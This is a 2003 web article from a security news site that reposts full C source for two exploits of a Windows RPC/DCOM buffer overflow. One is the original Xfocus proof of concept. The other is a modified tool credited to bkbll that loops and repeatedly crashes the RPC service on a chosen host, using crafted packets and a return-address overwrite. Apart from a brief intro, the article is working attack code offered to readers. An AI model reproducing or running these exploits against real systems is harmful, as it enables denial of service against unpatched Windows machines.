Exploit codes for MS03-039 (New RPC buffer overflow)

Thursday, September 11 2003 @ 11:48 PM EDT

Contributed by: William Reyor

Update
I've found anouther version of the exploit with similar code, by bkbll
http://www.cnhonker.com
modified the code from oc192 Security, the updated code is attached to the end of the end of this article.

Much publicity has been given to the recent discovery of the new buffer overflows in microsofts RPC/DCOM protocol. So for those of you interested, you can view the actual exploit code discovered by the Xfocus team(http://www.xfocus.net/), (http://www.k-otik.com/exploits/07.21.win2kdos.c.php).

Click read more to see the source of the new exploit.

// This is a new unpatched vulnerability - NOT the MS03-026

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

void main(int argc,char ** argv)
{
WSADATA WSAData;
int i;
SOCKET sock;
SOCKADDR_IN addr_in;

short port=135;
unsigned char buf1[0x1000];
printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");
printf("Code by FlashSky,Flashsky xfocus org,benjurry,benjurry xfocus org\n");
printf("Welcome to http://www.xfocus.net\n");
if(argc<2)
{
printf("useage:%s target\n",argv[0]);
exit(1);
}

if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return;
}

addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(port);
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
printf("Socket failed.Error:%d\n",WSAGetLastError());
return;
}
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
printf("Connect failed.Error:%d",WSAGetLastError());
return;
}
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}

i=recv(sock,buf1,1024,MSG_PEEK);
if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
}
****************Updated Attachment****************

RPC DCOM DoS exploit(s) coded by bkbll <bkbll@cnhonker.net>2003/08/07 Modified from oc192 Security<p>
/*
* Windows RPC DCOM Dos exploit
* by bkbll bkbll@cnhonker.net
* http://www.cnhonker.com
* modified the code from oc192 Security
*
* Usage:
* cl dcomdos.cpp
* dcomdos -d 10.10.10.135 -n 3000
*/

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <process.h>
#include <winsock2.h>
#include <windows.h>
#include <io.h>
#include <conio.h>
#include <fcntl.h>
#include <signal.h>

#pragma comment(lib,"ws2_32")

#define VER "2.3_beta"
int num=1;

/* xfocus start */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
/* end xfocus */

unsigned char scc[]=
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x46\x00\x58\x00"

"\xff\xff\xff\xff" /* return address */

"\xcc\xe0\xfd\x7f" /* primary thread data block */
"\xcc\xe0\xfd\x7f"; /* primary thread data block */

/* bindshell no RPC crash, defineable spawn port */

/* xfocus start */
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
/* end xfocus */
int type=0;
struct
{
char *os;
u_long ret;
}
targets[] =
{
// { "[Win2k-Universal]", 0x0018759F },
{ "[Win2k/XP-Universal]", 0x0100139d },
}, v;
char *optarg = NULL;
int optind = 1;
int opterr = 1;

#define _next_char(string) (char)(*(string+1))

int getopt(int argc, char *argv[], char *opstring)
{
static char *pIndexPosition = NULL;
char *pArgString = NULL;
char *pOptString;

if (pIndexPosition != NULL)
{
if (*(++pIndexPosition))
{
pArgString = pIndexPosition;
}
}

if (pArgString == NULL)
{
if (optind >= argc)
{
pIndexPosition = NULL; /* not in the middle of anything */
return EOF; /* used up all command-line arguments */
}
pArgString = argv[optind++]; /* set this to the next argument ptr */

if (('/' != *pArgString) && ('-' != *pArgString))
{
--optind; /* point to current arg once we're done */
optarg = NULL; /* no argument follows the option */
pIndexPosition = NULL; /* not in the middle of anything */
return EOF; /* used up all the command-line flags */
}

if ((strcmp(pArgString, "-") == 0) || (strcmp(pArgString, "--") == 0))
{
optarg = NULL; /* no argument follows the option */
pIndexPosition = NULL; /* not in the middle of anything */
return EOF; /* encountered the special flag */
}

pArgString++; /* look past the / or - */
}

if (':' == *pArgString)
{
return (opterr ? (int)'?' : (int)':');
}
else if ((pOptString = strchr(opstring, *pArgString)) == 0)
{
optarg = NULL; /* no argument follows the option */
pIndexPosition = NULL; /* not in the middle of anything */
return (opterr ? (int)'?' : (int)*pArgString);
}
else
{
if (':' == _next_char(pOptString))
{
if ('\0' != _next_char(pArgString)) optarg = &pArgString[1];
else
{
if (optind < argc) optarg = argv[optind++];
else
{
optarg = NULL;
return (opterr ? (int)'?' : (int)*pArgString);
}
}
pIndexPosition = NULL; /* not in the middle of anything */
}
else
{
optarg = NULL; /* no argument follows the option */
pIndexPosition = pArgString; /* point to the letter we're on */
}
return (int)*pArgString; /* return the letter that matched */
}
}

void usage(char *prog)
{
//int i;
printf("Usage:\n\n");
printf("%s -d <host> [options]\n", prog);
printf("Options:\n");
printf(" -d: Hostname to attack [Required]\n");
printf(" -p: Attack port [Default: 135]\n");
printf(" -n: offset.\n");
exit(0);
}

void sig(int j)
{
printf("\n[-] Received Ctrl+c\n");
printf("num=%d\n",num);
exit(0);
}

int main(int argc, char **argv)
{
int len, len1, c;
unsigned short port = 135;
char buf1[0x1000];
char buf2[0x1000];
// unsigned short lportl=666,lports; /* drg */
//char lport[] = "\x00\xFF\xFF\x8b"; /* drg */

struct hostent *he;
struct sockaddr_in their_addr;
static char *hostname=NULL;
SOCKET sockfd;
WSADATA wsd;
static char *conbackhost=NULL;
unsigned short conbackport=0;
unsigned short conbackportl=0;
//unsigned long ip;
unsigned char sc[40000];
int alllen=0,add90len=0;;
signal(SIGINT,&sig);

printf("RPC DCOM DoS exploit(%s) coded by bkbll <bkbll@cnhonker.net>, 2003/08/07\r\nModified from oc192 Security\n",VER);

if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
{
perror("WSAStartup error");
exit(0);
}

if(argc<2)
{
usage(argv[0]);
}

while((c = getopt(argc, argv, "d:p:n:"))!= EOF)
{
switch (c)
{
case 'd':
hostname = optarg;
break;
case 'p':
port = atoi(optarg);
if((port > 65535) || (port < 1))
{
printf("[-] Select a port between 1-65535\n");
return 1;
}
break;
case 'n':
num = atoi(optarg);
break;
default:
usage(argv[0]);
return 1;
}
}

if(hostname==NULL)
{
printf("[-] Please enter a hostname with -d\n");
exit(1);
}
if((conbackport==0) && (conbackhost!=NULL))
{
printf("[-] U must give me a port for connecting back\n");
exit(1);
}
if((conbackport>0) && (conbackhost==NULL))
{
printf("[-] U must give me a host for connecting back\n");
exit(1);
}

memcpy(scc+36, (unsigned char *) &targets[type].ret, 4);
printf("[+] Resolving host..");
fflush(stdout);
if((he = gethostbyname(hostname)) == NULL)
{
printf("Failed\n");
printf("[-] gethostbyname: Couldnt resolve hostname\n");
exit(1);
}

printf("Done.\n");
their_addr.sin_family = AF_INET;
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
their_addr.sin_port = htons(port);
AGAIN:
if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET)
{
perror("[-] Socket failed");
return(0);
}
CONN:
printf("[+] Connecting to %s:%d.....",hostname,port);

if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == SOCKET_ERROR)
{
printf("Failed\n");
perror("[-] Connect failed");
printf("Crashed,num=%d\n",num);
printf("[+] waiting server restart\r\n");
Sleep(8000);
goto CONN;
//return(0);
}
printf("ok\n");
while(1)
{
memset(sc,0,40000);
memcpy(sc,scc,sizeof(scc));
alllen+=sizeof(scc)-1;
add90len=num;
memset(sc+alllen,'C',num);
alllen+=num;
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);

*(unsigned long *)(request2)=*(unsigned long *)(request2)+alllen/2;
*(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+alllen/2;

memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,alllen);
len1=len1+alllen;
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);

*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+alllen-0xc;
*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+alllen-0xc;
*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+alllen-0xc;
*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+alllen-0xc;
*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+alllen-0xc;
*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+alllen-0xc;
*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+alllen-0xc;
*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+alllen-0xc;
/* end xfocus */
alllen=0;
if (send(sockfd,(const char *)bindstr,sizeof(bindstr),0)== SOCKET_ERROR)
{
if(WSAGetLastError()!=WSAECONNRESET)
{
printf("Target close the socket\r\n");
closesocket(sockfd);
goto AGAIN;
}
else
{
printf("[-] Send failed.........");
printf("error:%d\r\n",WSAGetLastError());
break;
}
}
len=recv(sockfd, buf1, 1000, 0);

if (send(sockfd,buf2,len1,0)== SOCKET_ERROR)
{
if(WSAGetLastError()!=WSAECONNRESET)
{
printf("Target close the socket\r\n");
closesocket(sockfd);
goto AGAIN;
}
else
{
printf("[-] Send failed.....");
printf("error:%d\r\n",WSAGetLastError());
printf("crashed,num=%d\r\n",num);
goto AGAIN;
}
}
num++;
}
printf("crashed,num=%d\r\n",num);
closesocket(sockfd);
WSACleanup();
return(0);
}

Comments (0)

Topsight.net
http://www.topsight.net/article.php/20030911234821849